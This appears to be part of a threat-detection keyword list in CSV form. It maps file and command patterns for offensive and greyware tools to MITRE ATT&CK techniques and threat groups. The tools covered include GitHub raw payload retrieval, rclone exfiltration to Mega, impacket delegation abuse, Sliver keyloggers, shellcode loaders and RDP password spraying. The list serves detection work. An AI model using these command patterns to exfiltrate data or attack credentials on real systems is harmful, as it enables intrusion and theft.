-*raw*/straight-shooter.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*raw.githubusercontent.com*.7z*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.apk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.app*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.as*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.asc*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.asp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.bash*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.bat*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.beacon*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.bin*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.bpl*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.c*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.cer*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.cmd*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.com*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.cpp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.crt*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.cs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.csh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.dat*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.dll*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.docm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.dos*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.exe*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.go*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.gz*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.hta*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.iso*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.jar*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.js*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.lnk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.log*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.mac*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.mam*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.msi*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.msp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.nexe*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.nim*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.otm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.out*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ova*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pem*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pfx*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pl*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.plx*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ppk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ps1*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.psm1*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pub*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.py*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pyc*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.pyo*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.rar*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.raw*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.reg*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.rgs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.RGS*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.run*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.scpt*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.script*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.sct*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.sh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ssh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.sys*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.teamserver*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.temp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.tgz*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.tmp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.vb*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.vbs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.vbscript*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.ws*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.wsf*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.wsh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.X86*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.X86_64*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.xlam*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.xlm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.xlsm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw.githubusercontent.com*.zip*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw_keylogger.tar.gz*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,1,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z -*rawrelayserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rawSHA1_linkedIn_fmt_plug*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rbcd.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*RBCD_Petitpotam_VulnerableServers.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*rbsec/dnscan*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,1,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*rc4.py *.bin*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*RCE-exploits*,offensive_tool_keyword,POC,poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. the samples are uploaded for education purposes for red and blue teams.,T1059.001 - T1210.001 - T1212 - T1055.012,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/smgorelik/Windows-RCE-exploits,1,1,N/A,N/A,8,731,187,2019-07-29T23:28:15Z,2018-02-13T11:23:40Z -*rclone copy *:*,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,N/A,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*rclone.exe config create remote mega user *,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,N/A,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*rclone.exe* copy *:*,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,N/A,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*rclone.exe* -l * *:*,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,interactive mode,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*RDE1-main.zip*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,1,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*rdi_net_user.cpp*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*rdp_check.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rdp_doublepulsar_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RDPassSpray.*.log*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*RDPassSpray.csv*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*RDPassSpray.py*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z 